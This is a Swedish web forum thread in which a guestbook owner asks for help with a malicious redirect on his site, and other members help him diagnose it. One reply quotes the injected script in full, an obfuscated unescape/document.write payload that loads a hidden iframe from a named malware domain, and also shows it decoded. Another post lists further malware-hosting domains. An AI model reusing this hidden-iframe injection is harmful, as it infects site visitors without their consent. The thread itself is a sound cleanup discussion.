Trädvy Permalänk
Medlem
Plats
Norrköping
Registrerad
Nov 2002

redirect i gästbok

http://www.smkostgota.com/phpboken/index.php
var ligger den kod som redirectar varje gång man öppnar fönstret? Någon måste alltså ha hackat sig in o lagt in koden i den befintliga? Det finns ju inga inlägg med engelskt dravel på , dom har jag tagit bort direkt. Några förslag ?

"nous somme les hommes de troup d´assault ..."

Trädvy Permalänk
Medlem
Plats
Lund
Registrerad
Jan 2005

Undra vad användarna tycker om att deras mail-adress skrivs i klartext i htmlen.

Trädvy Permalänk
Medlem
Plats
Uppsala
Registrerad
Apr 2003

hmm:

Webbplatsen www.smkostgota.com har rapporterats göra angrepp på datorer och har därför blockerats enligt dina säkerhetsinställningar.

Trädvy Permalänk
Medlem
Plats
Stockholm
Registrerad
Feb 2003

Menar du "Reported Attack Site!..."? Då är det nog Firefox som gör det och inte någon kod.

Trädvy Permalänk
Medlem
Plats
Norrköping
Registrerad
Nov 2002

meh....jag säger ju att det finns en redirect till en annan sida då är det klart att antivirus o windows säkerhetsinställningar reagerar. Men var finns koden??? Kan den ligga i db eller finns den i någon fil ?

"nous somme les hommes de troup d´assault ..."

Trädvy Permalänk
Medlem
Plats
Uppsala
Registrerad
Apr 2003

Detta får jag som förklaring iaf.

Safe Browsing
Diagnostic page for www.smkostgota.com

What is the current listing status for www.smkostgota.com?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-08-11, and the last time suspicious content was found on this site was on 2009-08-11.

Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including apexsearchgroup.info/, 213.155.29.0/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including garden-art.gr/.

This site was hosted on 1 network(s) including AS16245 (NGDC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, www.smkostgota.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Trädvy Permalänk
Medlem
Plats
Norrköping
Registrerad
Nov 2002

hmm , jag får leta lite mer. hata hata

"nous somme les hommes de troup d´assault ..."

Trädvy Permalänk
Medlem
Registrerad
Jan 2005

Det som stör är troligen script-elementet som ligger precis efter <body>:

<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%72%64%65%6E%2D%61%72%74%2E%67 %72%22%20%68%65%69%67%68%74%3D%22%2D%31%70%78%22%20%77%69%64%74%68%3D%22%2D%3 1%70%78%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69% 74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </Script>

eller, "avkodat":

document.write("<iframe src="http://garden-art.gr" height="-1px" width="-1px" style="visibility: hidden"></iframe>")

Hur den läggs till där kan nog ingen som inte har tillgång till hur sidan genereras svara på med någon säkerhet, men nu vet du vad du ska leta efter i alla fall; om det nu var det som var frågan?

Även, är det din <script>check_content()</script> som ligger längst ner i dokumentet? (Laddade bara ner dokumentet med wget och kollade med cat, så det kanske kan finnas mer om någon kollar mer noggrant. )

Trädvy Permalänk
Medlem
Plats
Norrköping
Registrerad
Nov 2002

jag tog bort bort alltihop. Tyckte det såg konstigt ut. Jag får väl ändra lösenord och hoppas det inte sker igen. Frågan är ju om det sker automatiskt eller om nån faktiskt lagt ner sin värdelösa tid på att hacka? Det finns ju inlägg i gästboken ibland som tagit sig förbi captcha bilden i loginet. Jag ska leta vidare o se om det finns något annat som ser skumt ut. Tack för hjälpen )

"nous somme les hommes de troup d´assault ..."

Trädvy Permalänk
Medlem
Plats
Norrköping
Registrerad
Nov 2002

något bra sätt (läs freeware) att snabbt söka igenom massa filer efter jakt på ord/kod?

"nous somme les hommes de troup d´assault ..."

Trädvy Permalänk
Medlem
Registrerad
Jan 2005
Citat:

Ursprungligen inskrivet av WRC
något bra sätt (läs freeware) att snabbt söka igenom massa filer efter jakt på ord/kod?

Beror lite på vilket OS du använder, t.ex. har du grep för *nix och Windows har någon inbyggd sökfunktion tror jag.